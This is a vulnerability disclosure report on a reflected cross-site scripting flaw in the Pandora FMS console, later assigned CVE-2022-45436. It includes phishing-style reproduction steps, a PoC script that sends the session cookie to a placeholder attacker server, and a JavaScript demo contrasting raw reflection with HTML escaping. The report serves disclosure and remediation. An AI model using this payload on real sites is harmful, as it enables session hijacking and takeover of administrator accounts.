Reflected Cross Site Scripting leading to session hijacking in pandorafms/pandorafms
Nov 1st 2022
XSS (Cross-Site Scripting) vulnerabilities arise when untrusted data is interpreted as code in a web context. A successful XSS attack effectively lets the attacker act as the logged-in target user, with the added danger of tricking the user into handing information (such as their password) to the attacker, or even downloading and executing malware on the user's workstation.
Steps to reproduce:
- Capture the request made by clicking the help button on "http://localhost:8080/pandora_console/index.php?sec=network&sec2=operation/agentes/pandora_networkmap" (as shown in the PoC).
- Place the payload in the "b" parameter of that request.
- Copy the resulting URL, payload included, and send it to a user logged in as admin.
- When the admin user visits the malicious link, the payload executes in their browser.
- The session cookie is sent to the attacker-controlled server.
- With that cookie, the attacker can log in as the admin.
Proof of Concept
<script>alert(document.cookie);var i=new Image;i.src="http://attacker_controlled_server/?"+document.cookie;</script>
An attacker can obtain any user's session cookie through this vulnerability and take over that user's session. If the attacker obtains an admin session, they gain full access to the application and can even delete users.
- Encode the reflected parameter for the context in which it is output (for the HTML body, htmlspecialchars() in PHP) instead of echoing it raw. If untrusted HTML genuinely has to be displayed, purify it first and contain it in a sandboxed frame. Marking the session cookie HttpOnly stops document.cookie from reading it, which defeats the cookie-exfiltration step of this PoC, though not the XSS itself.
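To make the reflection and the fix concrete, here is an added JavaScript example. It is not Pandora FMS code (the console is written in PHP); the handler names, the page markup and the cookie name are assumptions used for illustration. It renders a help page that echoes a "b" query parameter raw, renders the same page with HTML-context encoding, and runs the check a tester applies to confirm the finding: does the payload come back verbatim, or entity-encoded?

```javascript
// Added example: a simplified stand-in for a help page that reflects the
// "b" query parameter. Not the Pandora FMS source; renderHelp*, the markup
// and the PHPSESSID cookie name are assumptions for illustration.

// Minimal HTML-context encoder, equivalent in effect to PHP's
// htmlspecialchars($s, ENT_QUOTES): the five characters that can break out
// of text or attribute context are replaced by entities.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: the parameter is concatenated straight into the markup.
function renderHelpVulnerable(query) {
  const b = query.get('b') ?? '';
  return `<html><body><div id="help">Help topic: ${b}</div></body></html>`;
}

// Hardened: same page, but the reflected value is encoded for the HTML
// body context before it is emitted.
function renderHelpFixed(query) {
  const b = query.get('b') ?? '';
  return `<html><body><div id="help">Help topic: ${escapeHtml(b)}</div></body></html>`;
}

// The PoC payload from the report, used as the canary.
const POC = '<script>alert(document.cookie);var i=new Image;'
  + 'i.src="http://attacker_controlled_server/?"+document.cookie;</script>';

// Reflection check: build the request with the payload in "b", render the
// page, and report whether the payload is reflected verbatim (exploitable)
// or only in encoded form (safe in this context).
function checkReflection(render, payload) {
  const query = new URLSearchParams({ b: payload });
  const body = render(query);
  return {
    reflectedRaw: body.includes(payload),
    reflectedEncoded: body.includes(escapeHtml(payload)),
  };
}

// Session cookie attributes: HttpOnly keeps document.cookie from reading
// the session id, so the exfiltration step of this PoC fails even where
// the script itself still runs. Cookie name is an assumption.
function sessionCookieHeader(name, sid) {
  return `${name}=${encodeURIComponent(sid)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

console.log('vulnerable:', checkReflection(renderHelpVulnerable, POC));
console.log('fixed:     ', checkReflection(renderHelpFixed, POC));
console.log('Set-Cookie:', sessionCookieHeader('PHPSESSID', 'example-session-id'));
```

Run it with node; the vulnerable renderer reports reflectedRaw: true, the fixed one reports reflectedRaw: false and reflectedEncoded: true. The same canary-and-compare check works against a live target by substituting an HTTP fetch of the help URL for the render call.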
@admin can we have a CVE for this issue?
Pandora is a CNA and they usually assign CVEs before public disclosure if the report portrays a valid vulnerability :)
Fixed in v766 --> CVE-2022-45436